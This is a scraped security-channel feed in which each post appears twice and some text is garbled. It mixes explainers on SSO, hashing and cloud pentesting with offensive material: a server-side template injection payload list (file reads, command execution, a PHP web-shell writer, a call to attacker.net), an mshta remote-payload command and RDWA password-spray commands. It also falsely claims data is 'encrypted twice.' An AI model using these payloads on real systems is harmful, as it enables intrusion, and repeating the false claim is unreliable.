๐ฆHow Account Takeover Techniques: Critical Vulnerabilities Mindmap" ?
Account takeover (ATO) is a critical vulnerability that can compromise sensitive user data and system integrity. This mindmap outlines various ATO techniques, including:
IDOR in Password Reset
Password Reset Poisoning
Mass Assignment
OAuth Misconfigurations
Improper Rate-Limit Checks etc...........
Ref: AMIT KUMAR
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Account takeover (ATO) is a critical vulnerability that can compromise sensitive user data and system integrity. This mindmap outlines various ATO techniques, including:
IDOR in Password Reset
Password Reset Poisoning
Mass Assignment
OAuth Misconfigurations
Improper Rate-Limit Checks etc...........
Ref: AMIT KUMAR
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆFREE courses to boost your skills! ๐
1. Splunk Courses
lnkd.in/d_dZNduf
2. Fortinet Courses
lnkd.in/dmmkZ-tH
3. AttackIQ MITRE ATT&CK Courses
lnkd.in/dcfmSPEJ
4. Microsoft SC-200 Course
lnkd.in/dbCn3k4n
5. Awesome OSINT Courses
lnkd.in/dTCaCf-u
6. CSILinux Forensic Trainings
lnkd.in/dhjwx_5h
Ref: Mohamed Hamdi
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
1. Splunk Courses
lnkd.in/d_dZNduf
2. Fortinet Courses
lnkd.in/dmmkZ-tH
3. AttackIQ MITRE ATT&CK Courses
lnkd.in/dcfmSPEJ
4. Microsoft SC-200 Course
lnkd.in/dbCn3k4n
5. Awesome OSINT Courses
lnkd.in/dTCaCf-u
6. CSILinux Forensic Trainings
lnkd.in/dhjwx_5h
Ref: Mohamed Hamdi
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆNew SSTI (Server Side Template Injection) - Payloads
Generic
${{<%[%'"}}%\.
{% debug %}
{7*7}
{{ '7'*7 }}
{2*2}[[7*7]]
<%= 7 * 7 %>
#{3*3}
#{ 3 * 3 }
[[3*3]]
${2*2}
@(3*3)
${= 3*3}
{{= 7*7}}
${{7*7}}
#{7*7}
[=7*7]
{{ request }}
{{self}}
{{dump(app)}}
{{ [] .class.base.subclassesO }}
{{''.class.mro()[l] .subclassesO}}
for c in [1,2,3] %}{{ c,c,c }}{% endfor %}
{{ []._class.base.subclasses_O }}
{{['cat%20/etc/passwd']|filter('system')}}
PHP
{php}print "Hello"{/php}
{php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php}
{{dump(app)}}
{{app.request.server.all|join(',')}}
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{$smarty.version}
{php}echo id;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
Python
{% debug %}
{{settings.SECRET_KEY}}
{% import foobar %} = Error
{% import os %}{{os.system('whoami')}}
Ref: Aman Dara
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Generic
${{<%[%'"}}%\.
{% debug %}
{7*7}
{{ '7'*7 }}
{2*2}[[7*7]]
<%= 7 * 7 %>
#{3*3}
#{ 3 * 3 }
[[3*3]]
${2*2}
@(3*3)
${= 3*3}
{{= 7*7}}
${{7*7}}
#{7*7}
[=7*7]
{{ request }}
{{self}}
{{dump(app)}}
{{ [] .class.base.subclassesO }}
{{''.class.mro()[l] .subclassesO}}
for c in [1,2,3] %}{{ c,c,c }}{% endfor %}
{{ []._class.base.subclasses_O }}
{{['cat%20/etc/passwd']|filter('system')}}
PHP
{php}print "Hello"{/php}
{php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php}
{{dump(app)}}
{{app.request.server.all|join(',')}}
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{$smarty.version}
{php}echo id;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
Python
{% debug %}
{{settings.SECRET_KEY}}
{% import foobar %} = Error
{% import os %}{{os.system('whoami')}}
Ref: Aman Dara
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ LOLbins attacks :
mshta.exe is a legitimate system executable included in Microsoft Windows. It stands for Microsoft HTML Application Host, and its primary purpose is to execute HTML Applications (HTA files). These HTA files are standalone applications that use HTML, JavaScript, VBScript, or other scripting languages.
During an incident response exercise, we identified a sophisticated adversary leveraging Living-Off-The-Land Binaries (LOLBins) to perform malicious actions. They used PowerShell to execute commands, minimizing their footprint and evading detection.
The activity was flagged when Windows Defender logged multiple Event ID 4104 entries in the Microsoft-Windows-PowerShell/Operational log.
Note : These logs revealed suspicious PowerShell commands executing obfuscated scripts.
Further investigation uncovered the use of mshta.exe to load a remote payload via a seemingly legitimate URL.
Key points:
Attackers frequently abuse mshta.exe as part of Living-Off-The-Land Binaries (LOLBins) because:
1>Bypasses Security Controls:
Since it's a legitimate system utility, some security tools may not flag its use as suspicious.
2>Remote Code Execution:
mshta.exe can execute malicious scripts hosted remotely, allowing attackers to deliver payloads via URLs.
Sample Code : mshta.exe "hzzp://malicious-domain[.]com/payload[.]hta"
hashtag#incidentresponse hashtag#dfir hashtag#soc hashtag#cybersecurity hashtag#mitre hashtag#attack hashtag#windows
Ref: Soumick kar
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
mshta.exe is a legitimate system executable included in Microsoft Windows. It stands for Microsoft HTML Application Host, and its primary purpose is to execute HTML Applications (HTA files). These HTA files are standalone applications that use HTML, JavaScript, VBScript, or other scripting languages.
During an incident response exercise, we identified a sophisticated adversary leveraging Living-Off-The-Land Binaries (LOLBins) to perform malicious actions. They used PowerShell to execute commands, minimizing their footprint and evading detection.
The activity was flagged when Windows Defender logged multiple Event ID 4104 entries in the Microsoft-Windows-PowerShell/Operational log.
Note : These logs revealed suspicious PowerShell commands executing obfuscated scripts.
Further investigation uncovered the use of mshta.exe to load a remote payload via a seemingly legitimate URL.
Key points:
Attackers frequently abuse mshta.exe as part of Living-Off-The-Land Binaries (LOLBins) because:
1>Bypasses Security Controls:
Since it's a legitimate system utility, some security tools may not flag its use as suspicious.
2>Remote Code Execution:
mshta.exe can execute malicious scripts hosted remotely, allowing attackers to deliver payloads via URLs.
Sample Code : mshta.exe "hzzp://malicious-domain[.]com/payload[.]hta"
hashtag#incidentresponse hashtag#dfir hashtag#soc hashtag#cybersecurity hashtag#mitre hashtag#attack hashtag#windows
Ref: Soumick kar
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐๐๐๐_๐๐ฒ๐๐๐ซ๐ฌ๐๐๐ฎ๐ซ๐ข๐ญ๐ฒ_๐๐ฎ๐๐ข๐ญ_๐๐ก๐๐๐ค๐ฅ๐ข๐ฌ๐ญ.pdf
1.7 MB
๐๐๐๐ ๐๐ฒ๐๐๐ซ๐ฌ๐๐๐ฎ๐ซ๐ข๐ญ๐ฒ ๐๐ฎ๐๐ข๐ญ ๐๐ก๐๐๐ค๐ฅ๐ข๐ฌ๐ญ
Forwarded from Exploiting Crew (Pr1vAt3)
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from Exploiting Crew (Pr1vAt3)
๐ฆSSO (Single Sign-On) Explained.
SSO can be thought of as a master key to open all different locks. It allows a user to log in to different systems using a single set of credentials.
In a time where we are accessing more applications than ever before, this is a big help to mitigate password fatigue and streamlines user experience.
To fully understand the SSO process, ๐น๐ฒ๐โ๐ ๐๐ฎ๐ธ๐ฒ ๐ฎ ๐น๐ผ๐ผ๐ธ ๐ฎ๐ ๐ต๐ผ๐ ๐ฎ ๐๐๐ฒ๐ฟ ๐๐ผ๐๐น๐ฑ ๐น๐ผ๐ด ๐ถ๐ป๐๐ผ ๐๐ถ๐ป๐ธ๐ฒ๐ฑ๐๐ป ๐๐๐ถ๐ป๐ด ๐๐ผ๐ผ๐ด๐น๐ฒ ๐ฎ๐ ๐๐ต๐ฒ ๐ถ๐ฑ๐ฒ๐ป๐๐ถ๐๐ ๐ฝ๐ฟ๐ผ๐๐ถ๐ฑ๐ฒ๐ฟ:
๐ญ) ๐จ๐๐ฒ๐ฟ ๐ฟ๐ฒ๐พ๐๐ฒ๐๐๐ ๐ฎ๐ฐ๐ฐ๐ฒ๐๐
First, the user would attempt to access the Service Provider (LinkedIn). At this point, a user would be presented with login options, and in this example, they would select "Sign in with Google".
๐ฎ) ๐๐๐๐ต๐ฒ๐ป๐๐ถ๐ฐ๐ฎ๐๐ถ๐ผ๐ป ๐ฟ๐ฒ๐พ๐๐ฒ๐๐
From here, the Service Provider (LinkedIn) will redirect the user to the Identity Provider (Google) with an authentication request.
๐ฏ) ๐๐ฑ๐ฃ ๐ฐ๐ต๐ฒ๐ฐ๐ธ๐ ๐ณ๐ผ๐ฟ ๐ฎ๐ฐ๐๐ถ๐๐ฒ ๐๐ฒ๐๐๐ถ๐ผ๐ป
Once the Identity Provider (Google) has received the request, it will check for an active session. If it doesn't find one, authentication will be requested.
๐ฐ) ๐จ๐๐ฒ๐ฟ ๐๐๐ฏ๐บ๐ถ๐๐ ๐ฐ๐ฟ๐ฒ๐ฑ๐ฒ๐ป๐๐ถ๐ฎ๐น๐
At this stage, the user will submit their login credentials (username and password) to the Identity Provider (IdP).
๐ฑ) ๐๐ฑ๐ฃ ๐๐ฒ๐ฟ๐ถ๐ณ๐ถ๐ฒ๐ ๐ฐ๐ฟ๐ฒ๐ฑ๐ฒ๐ป๐๐ถ๐ฎ๐น๐
The Identity Provider will then verify the submitted credentials against its User Directory (database). If the credentials are correct, the IdP will create an authentication token or assertion.
๐ฒ) ๐๐ฑ๐ฃ ๐๐ฒ๐ป๐ฑ๐ ๐๐ผ๐ธ๐ฒ๐ป ๐๐ผ ๐ฆ๐ฒ๐ฟ๐๐ถ๐ฐ๐ฒ ๐ฃ๐ฟ๐ผ๐๐ถ๐ฑ๐ฒ๐ฟ
Once the token or assertion has been created, the IdP sends it back to the Service Provider confirming the user's identity. The user is now authenticated and can access the Service Provier (LinkedIn).
๐ณ) ๐๐ฐ๐ฐ๐ฒ๐๐ ๐ด๐ฟ๐ฎ๐ป๐๐ฒ๐ฑ ๐๐๐ถ๐ป๐ด ๐ฒ๐ ๐ถ๐๐๐ถ๐ป๐ด ๐๐ฒ๐๐๐ถ๐ผ๐ป
Since the Identity Provider has established a session, when the user goes to access a different Service Provider (eg; GitHub), they won't need to re-enter their credentials. Future service providers will request authentication from the Identity Provider, recognize the existing session, and grant access to the user based on the previously authenticated session.
SSO workflows like the above operate on SSO protocols, which are a set of rules that govern how the IdP and SP communicate and trust each other. Common protocols include Security Assertion Markup Language (SAML), OpenID Connect, and OAuth.
๐ญ What's your favourite way to go about authentication? ๐ฌ
Ref: Nikki SiapnoNikki Siapno
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
SSO can be thought of as a master key to open all different locks. It allows a user to log in to different systems using a single set of credentials.
In a time where we are accessing more applications than ever before, this is a big help to mitigate password fatigue and streamlines user experience.
To fully understand the SSO process, ๐น๐ฒ๐โ๐ ๐๐ฎ๐ธ๐ฒ ๐ฎ ๐น๐ผ๐ผ๐ธ ๐ฎ๐ ๐ต๐ผ๐ ๐ฎ ๐๐๐ฒ๐ฟ ๐๐ผ๐๐น๐ฑ ๐น๐ผ๐ด ๐ถ๐ป๐๐ผ ๐๐ถ๐ป๐ธ๐ฒ๐ฑ๐๐ป ๐๐๐ถ๐ป๐ด ๐๐ผ๐ผ๐ด๐น๐ฒ ๐ฎ๐ ๐๐ต๐ฒ ๐ถ๐ฑ๐ฒ๐ป๐๐ถ๐๐ ๐ฝ๐ฟ๐ผ๐๐ถ๐ฑ๐ฒ๐ฟ:
๐ญ) ๐จ๐๐ฒ๐ฟ ๐ฟ๐ฒ๐พ๐๐ฒ๐๐๐ ๐ฎ๐ฐ๐ฐ๐ฒ๐๐
First, the user would attempt to access the Service Provider (LinkedIn). At this point, a user would be presented with login options, and in this example, they would select "Sign in with Google".
๐ฎ) ๐๐๐๐ต๐ฒ๐ป๐๐ถ๐ฐ๐ฎ๐๐ถ๐ผ๐ป ๐ฟ๐ฒ๐พ๐๐ฒ๐๐
From here, the Service Provider (LinkedIn) will redirect the user to the Identity Provider (Google) with an authentication request.
๐ฏ) ๐๐ฑ๐ฃ ๐ฐ๐ต๐ฒ๐ฐ๐ธ๐ ๐ณ๐ผ๐ฟ ๐ฎ๐ฐ๐๐ถ๐๐ฒ ๐๐ฒ๐๐๐ถ๐ผ๐ป
Once the Identity Provider (Google) has received the request, it will check for an active session. If it doesn't find one, authentication will be requested.
๐ฐ) ๐จ๐๐ฒ๐ฟ ๐๐๐ฏ๐บ๐ถ๐๐ ๐ฐ๐ฟ๐ฒ๐ฑ๐ฒ๐ป๐๐ถ๐ฎ๐น๐
At this stage, the user will submit their login credentials (username and password) to the Identity Provider (IdP).
๐ฑ) ๐๐ฑ๐ฃ ๐๐ฒ๐ฟ๐ถ๐ณ๐ถ๐ฒ๐ ๐ฐ๐ฟ๐ฒ๐ฑ๐ฒ๐ป๐๐ถ๐ฎ๐น๐
The Identity Provider will then verify the submitted credentials against its User Directory (database). If the credentials are correct, the IdP will create an authentication token or assertion.
๐ฒ) ๐๐ฑ๐ฃ ๐๐ฒ๐ป๐ฑ๐ ๐๐ผ๐ธ๐ฒ๐ป ๐๐ผ ๐ฆ๐ฒ๐ฟ๐๐ถ๐ฐ๐ฒ ๐ฃ๐ฟ๐ผ๐๐ถ๐ฑ๐ฒ๐ฟ
Once the token or assertion has been created, the IdP sends it back to the Service Provider confirming the user's identity. The user is now authenticated and can access the Service Provier (LinkedIn).
๐ณ) ๐๐ฐ๐ฐ๐ฒ๐๐ ๐ด๐ฟ๐ฎ๐ป๐๐ฒ๐ฑ ๐๐๐ถ๐ป๐ด ๐ฒ๐ ๐ถ๐๐๐ถ๐ป๐ด ๐๐ฒ๐๐๐ถ๐ผ๐ป
Since the Identity Provider has established a session, when the user goes to access a different Service Provider (eg; GitHub), they won't need to re-enter their credentials. Future service providers will request authentication from the Identity Provider, recognize the existing session, and grant access to the user based on the previously authenticated session.
SSO workflows like the above operate on SSO protocols, which are a set of rules that govern how the IdP and SP communicate and trust each other. Common protocols include Security Assertion Markup Language (SAML), OpenID Connect, and OAuth.
๐ญ What's your favourite way to go about authentication? ๐ฌ
Ref: Nikki SiapnoNikki Siapno
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Forwarded from Exploiting Crew (Pr1vAt3)
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from Exploiting Crew (Pr1vAt3)
This media is not supported in your browser
VIEW IN TELEGRAM
๐ฆExtracting information remotely from Microsoft Remote Desktop Web Access (RDWA) with RDWAtool
๐ Microsoft Remote Desktop Web Access (RDWA) applications are often overlooked yet can be a treasure trove of information for attackers. RDWAtool is a Python-based all-in-one tool designed to analyze and test RDWA instances for vulnerabilities while extracting valuable insights.
๐ What can RDWAtool do?
1๏ธโฃ Extract useful Information in black box remotely:
- FQDN of the remote server to map the environment.
- Internal AD domain name derived from the FQDN.
- Remote Windows Server version for targeted exploitation.
In brute mode:
> Free <
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ Microsoft Remote Desktop Web Access (RDWA) applications are often overlooked yet can be a treasure trove of information for attackers. RDWAtool is a Python-based all-in-one tool designed to analyze and test RDWA instances for vulnerabilities while extracting valuable insights.
๐ What can RDWAtool do?
1๏ธโฃ Extract useful Information in black box remotely:
- FQDN of the remote server to map the environment.
- Internal AD domain name derived from the FQDN.
- Remote Windows Server version for targeted exploitation.
In spray mode:
rdwatool spray -tu https://rds.podalirius.net/RDWeb/Pages/en-US/login.aspx
In brute mode:
rdwatool brute -tu https://rds.podalirius.net/RDWeb/Pages/en-US/login.aspx
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Forwarded from Exploiting Crew (Pr1vAt3)
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from Exploiting Crew (Pr1vAt3)
๐ฆ๐ฐ Cost Savings: SSE vs. SASE Simplified!
๐ Organizations leveraging Palo Alto Networks experience significant ROI through unified management and simplified operationsโall within a single pane of glass.
Streamline your security strategy while accelerating growth!
Whatโs the Difference?
๐ SSE (Security Service Edge):
Focuses on securing access to apps and data for remote and on-premises users.
Core features: SWG, CASB, and ZTNA for seamless, secure connectivity.
๐ SASE (Secure Access Service Edge):
Combines networking (SD-WAN) and security services in a single cloud-delivered solution.
Perfect for securing distributed users and sites with optimal performance.
Why Choose Palo Alto Networks?
โ๏ธ Unified platform for better visibility and control.
โ๏ธ Simplified operations with scalable solutions for all use cases.
โ๏ธ Future-ready security with proven innovation.
Letโs make security smarter, faster, and simplerโtogether!
Ref: Dhari A.Dhari A.
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ Organizations leveraging Palo Alto Networks experience significant ROI through unified management and simplified operationsโall within a single pane of glass.
Streamline your security strategy while accelerating growth!
Whatโs the Difference?
๐ SSE (Security Service Edge):
Focuses on securing access to apps and data for remote and on-premises users.
Core features: SWG, CASB, and ZTNA for seamless, secure connectivity.
๐ SASE (Secure Access Service Edge):
Combines networking (SD-WAN) and security services in a single cloud-delivered solution.
Perfect for securing distributed users and sites with optimal performance.
Why Choose Palo Alto Networks?
โ๏ธ Unified platform for better visibility and control.
โ๏ธ Simplified operations with scalable solutions for all use cases.
โ๏ธ Future-ready security with proven innovation.
Letโs make security smarter, faster, and simplerโtogether!
Ref: Dhari A.Dhari A.
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Honeypot Integration with Elastic Stack - A Practical Guide ๐ก
In this project , i have integrated Honeypot (trap for hackers) with the ELK Stack to monitor the real-time alerts and advanced threat hunting. ๐ต๏ธโโ๏ธ
๐ง Key Steps:
1๏ธโฃ Honeypot Setup: Deployed multiple honeypot services to capture malicious activity. (Requires a public IP ๐)
2๏ธโฃ ELK Stack Installation: The Elastic Stack plays a pivotal role in collecting, storing, and visualizing the data from the T-Pot honeypot. ๐
3๏ธโฃ Data Filtration & Visualization: Filtered and visualized attack data in Kibana for actionable insights. ๐๐
Note : This project can be extended to capture the IOCโs like users can add their own threat intelligence databases and can use python scripts to train the machine learning models for future use .๐For instance , a MISP instance can be setup to store the IOC's from this honeypot.
Ref: HAMZA JAMEEL
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
In this project , i have integrated Honeypot (trap for hackers) with the ELK Stack to monitor the real-time alerts and advanced threat hunting. ๐ต๏ธโโ๏ธ
๐ง Key Steps:
1๏ธโฃ Honeypot Setup: Deployed multiple honeypot services to capture malicious activity. (Requires a public IP ๐)
2๏ธโฃ ELK Stack Installation: The Elastic Stack plays a pivotal role in collecting, storing, and visualizing the data from the T-Pot honeypot. ๐
3๏ธโฃ Data Filtration & Visualization: Filtered and visualized attack data in Kibana for actionable insights. ๐๐
Note : This project can be extended to capture the IOCโs like users can add their own threat intelligence databases and can use python scripts to train the machine learning models for future use .๐For instance , a MISP instance can be setup to store the IOC's from this honeypot.
Ref: HAMZA JAMEEL
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Forwarded from Exploiting Crew (Pr1vAt3)
๐ฆ ShellSweep: Detecting Web Shells Made Easy for Defenders ๐
๐ What is ShellSweep?
ShellSweep is a suite of open-source tools designed to detect web shells using entropy analysis, static code checks, and heuristic methods. From incident response to threat hunting, ShellSweep helps defenders identify suspicious files quickly and efficiently.
๐ Why Defenders Need ShellSweep
โ Test Your Coverage: Validate analytic detection for file mods, process executions, and suspicious behavior from web shells.
โ Tuning & Training: Scan web servers, analyze entropy baselines, and tune detection to YOUR environment.
โ Lightweight & Customizable: Works locally, supports PowerShell, Python, and Lua. Full control with zero dependency on external services.
๐ ShellSweep: The foundation.
- Detects web shells using entropy-based analysis.
- Scans key extensions (.asp, .aspx, .php, .jsp) for high-entropy anomalies.
- Outputs file paths, entropy values, and hashes.
๐๐ ShellSweepPlus: Enhanced detection.
- Dynamic entropy thresholds.
- Multi-layered detection: Entropy, StdDev, Mixed Mode, and Heuristics.
- Static code analysis to spot malicious patterns.
- JSON outputs for structured results & further analysis.
๐๐๐ ShellSweepX: Next-level, centralized detection.
- Combines entropy analysis, machine learning, and YARA rule matching.
- Cross-platform (PowerShell, Python, Bash).
- API integration for automated scans and result management.
- Web interface for visualizing and managing detections.
โจ Perfect for Incident Responders & Threat Hunters
๐ก Deploy ShellSweep tools in test or production environments.
๐ Load up your preferred web shells, simulate uploads, and refine detection rules.
๐ Detect new or obfuscated threats. Identify gaps. Tune your defenses.
๐งฐ ShellSweep: ShellSweeping the Evil!
Ref: Michael H.Michael H.
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ What is ShellSweep?
ShellSweep is a suite of open-source tools designed to detect web shells using entropy analysis, static code checks, and heuristic methods. From incident response to threat hunting, ShellSweep helps defenders identify suspicious files quickly and efficiently.
๐ Why Defenders Need ShellSweep
โ Test Your Coverage: Validate analytic detection for file mods, process executions, and suspicious behavior from web shells.
โ Tuning & Training: Scan web servers, analyze entropy baselines, and tune detection to YOUR environment.
โ Lightweight & Customizable: Works locally, supports PowerShell, Python, and Lua. Full control with zero dependency on external services.
๐ ShellSweep: The foundation.
- Detects web shells using entropy-based analysis.
- Scans key extensions (.asp, .aspx, .php, .jsp) for high-entropy anomalies.
- Outputs file paths, entropy values, and hashes.
๐๐ ShellSweepPlus: Enhanced detection.
- Dynamic entropy thresholds.
- Multi-layered detection: Entropy, StdDev, Mixed Mode, and Heuristics.
- Static code analysis to spot malicious patterns.
- JSON outputs for structured results & further analysis.
๐๐๐ ShellSweepX: Next-level, centralized detection.
- Combines entropy analysis, machine learning, and YARA rule matching.
- Cross-platform (PowerShell, Python, Bash).
- API integration for automated scans and result management.
- Web interface for visualizing and managing detections.
โจ Perfect for Incident Responders & Threat Hunters
๐ก Deploy ShellSweep tools in test or production environments.
๐ Load up your preferred web shells, simulate uploads, and refine detection rules.
๐ Detect new or obfuscated threats. Identify gaps. Tune your defenses.
๐งฐ ShellSweep: ShellSweeping the Evil!
Ref: Michael H.Michael H.
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
GitHub
GitHub - splunk/ShellSweep: ShellSweeping the evil.
ShellSweeping the evil. Contribute to splunk/ShellSweep development by creating an account on GitHub.
Forwarded from Exploiting Crew (Pr1vAt3)
๐ฆEncryption vs Hashing - What's the difference?
Imagine you have a secret recipe for a cake, and you want to share it with a friend.
๐คตEncryption:
You lock the recipe in a box with a key and give the box to your friend.
Your friend can unlock the box (with the key you gave them) and read the recipe.
If someone else finds the box without the key, they can't read it.
Key Point: It can be reversed if you have the key (decrypt it).
๐งHashing:
You put the recipe in a blender and blend it into a unique smoothie.
Now itโs impossible to get the original recipe back from the smoothie.
But if someone else blends the exact same recipe, theyโll get the exact same smoothie.
Key Point: One-way process. You canโt go back to the recipe, but you can check if two smoothies match.
In short:
Encryption is like locking something upโcan be unlocked.
Hashing is like turning it into mushโyou canโt un-mush it!
As both methods involve turning data into a scrambled form, one might consider these two the same. However, there is a distinction you must know about:
Data is encrypted twice while itโs only hashed once.
One can encrypt/decrypt a piece of data, meaning that the original text can be retrieved back. However, retrieval of plain text isnโt possible if data is hashed once.
Ref: Santosh Nandakumar
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Imagine you have a secret recipe for a cake, and you want to share it with a friend.
๐คตEncryption:
You lock the recipe in a box with a key and give the box to your friend.
Your friend can unlock the box (with the key you gave them) and read the recipe.
If someone else finds the box without the key, they can't read it.
Key Point: It can be reversed if you have the key (decrypt it).
๐งHashing:
You put the recipe in a blender and blend it into a unique smoothie.
Now itโs impossible to get the original recipe back from the smoothie.
But if someone else blends the exact same recipe, theyโll get the exact same smoothie.
Key Point: One-way process. You canโt go back to the recipe, but you can check if two smoothies match.
In short:
Encryption is like locking something upโcan be unlocked.
Hashing is like turning it into mushโyou canโt un-mush it!
As both methods involve turning data into a scrambled form, one might consider these two the same. However, there is a distinction you must know about:
Data is encrypted twice while itโs only hashed once.
One can encrypt/decrypt a piece of data, meaning that the original text can be retrieved back. However, retrieval of plain text isnโt possible if data is hashed once.
Ref: Santosh Nandakumar
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆCloud Pentesting Cheatsheet๐ก
Cloud penetration testing is a crucial skill to identify vulnerabilities in cloud environments like AWS, Azure, and Google Cloud Platform (GCP). This cheatsheet simplifies complex concepts and helps you take your cloud security game to the next level!
๐Whatโs Inside?
1๏ธโฃ Key Testing Steps:
โข Reconnaissance: Identify misconfigured assets, open ports, and exposed services in the cloud.
โข Enumeration: Gather details about cloud accounts, storage buckets, APIs, and permissions.
โข Exploitation: Simulate attacks by exploiting misconfigurations, weak access controls, or privilege escalation opportunities.
โข Post-Exploitation: Assess the impact by reviewing data leakage and persistence mechanisms.
2๏ธโฃ Cloud-specific Vulnerabilities:
โข Misconfigured IAM roles and policies leading to unauthorized access.
โข Publicly accessible storage buckets exposing sensitive data.
โข Weak or absent encryption protocols for data in transit or at rest.
โข Exploitable serverless functions (e.g., AWS Lambda) due to insecure coding practices.
โข Over-permissive security groups allowing unrestricted traffic.
3๏ธโฃ Essential Tools for Cloud Pentesting:
โข ScoutSuite: Multi-cloud security auditing.
โข Pacu: AWS exploitation framework for testing security.
โข Cloudsploit: Scan configurations for security issues.
โข Burp Suite: Analyze APIs in cloud applications.
โข Nmap: Detect open ports and vulnerable services in the cloud.
โข AWS CLI and GCP CLI: Enumerate configurations directly from the command line.
4๏ธโฃ Best Practices:
โข Use least privilege policies for all IAM roles and accounts.
โข Enable logging and monitoring through services like AWS CloudTrail or Azure Monitor.
โข Apply encryption standards (TLS, AES-256) to protect sensitive data.
โข Regularly perform compliance checks using CIS Benchmarks and OWASP Cloud Top 10.
โจ Key Areas to Focus On:
๐ Authentication and Authorization Flaws:
โข Check for mismanaged credentials (e.g., leaked keys or weak passwords).
โข Review SSO configurations for potential bypass scenarios.
๐ Storage Misconfigurations:
โข Detect open storage buckets or public file access.
โข Ensure data is encrypted and access is controlled through proper permissions.
๐ก Network Security Risks:
โข Audit firewall rules and security groups to detect overly permissive settings.
โข Identify exposed management ports (SSH, RDP, etc.).
๐ Serverless Security Issues:
โข Look for weak input validation and insecure API integrations in serverless applications.
โข Check timeout and resource limits to mitigate DoS risks.
Ref: Santosh Nandakumar
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Cloud penetration testing is a crucial skill to identify vulnerabilities in cloud environments like AWS, Azure, and Google Cloud Platform (GCP). This cheatsheet simplifies complex concepts and helps you take your cloud security game to the next level!
๐Whatโs Inside?
1๏ธโฃ Key Testing Steps:
โข Reconnaissance: Identify misconfigured assets, open ports, and exposed services in the cloud.
โข Enumeration: Gather details about cloud accounts, storage buckets, APIs, and permissions.
โข Exploitation: Simulate attacks by exploiting misconfigurations, weak access controls, or privilege escalation opportunities.
โข Post-Exploitation: Assess the impact by reviewing data leakage and persistence mechanisms.
2๏ธโฃ Cloud-specific Vulnerabilities:
โข Misconfigured IAM roles and policies leading to unauthorized access.
โข Publicly accessible storage buckets exposing sensitive data.
โข Weak or absent encryption protocols for data in transit or at rest.
โข Exploitable serverless functions (e.g., AWS Lambda) due to insecure coding practices.
โข Over-permissive security groups allowing unrestricted traffic.
3๏ธโฃ Essential Tools for Cloud Pentesting:
โข ScoutSuite: Multi-cloud security auditing.
โข Pacu: AWS exploitation framework for testing security.
โข Cloudsploit: Scan configurations for security issues.
โข Burp Suite: Analyze APIs in cloud applications.
โข Nmap: Detect open ports and vulnerable services in the cloud.
โข AWS CLI and GCP CLI: Enumerate configurations directly from the command line.
4๏ธโฃ Best Practices:
โข Use least privilege policies for all IAM roles and accounts.
โข Enable logging and monitoring through services like AWS CloudTrail or Azure Monitor.
โข Apply encryption standards (TLS, AES-256) to protect sensitive data.
โข Regularly perform compliance checks using CIS Benchmarks and OWASP Cloud Top 10.
โจ Key Areas to Focus On:
๐ Authentication and Authorization Flaws:
โข Check for mismanaged credentials (e.g., leaked keys or weak passwords).
โข Review SSO configurations for potential bypass scenarios.
๐ Storage Misconfigurations:
โข Detect open storage buckets or public file access.
โข Ensure data is encrypted and access is controlled through proper permissions.
๐ก Network Security Risks:
โข Audit firewall rules and security groups to detect overly permissive settings.
โข Identify exposed management ports (SSH, RDP, etc.).
๐ Serverless Security Issues:
โข Look for weak input validation and insecure API integrations in serverless applications.
โข Check timeout and resource limits to mitigate DoS risks.
Ref: Santosh Nandakumar
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ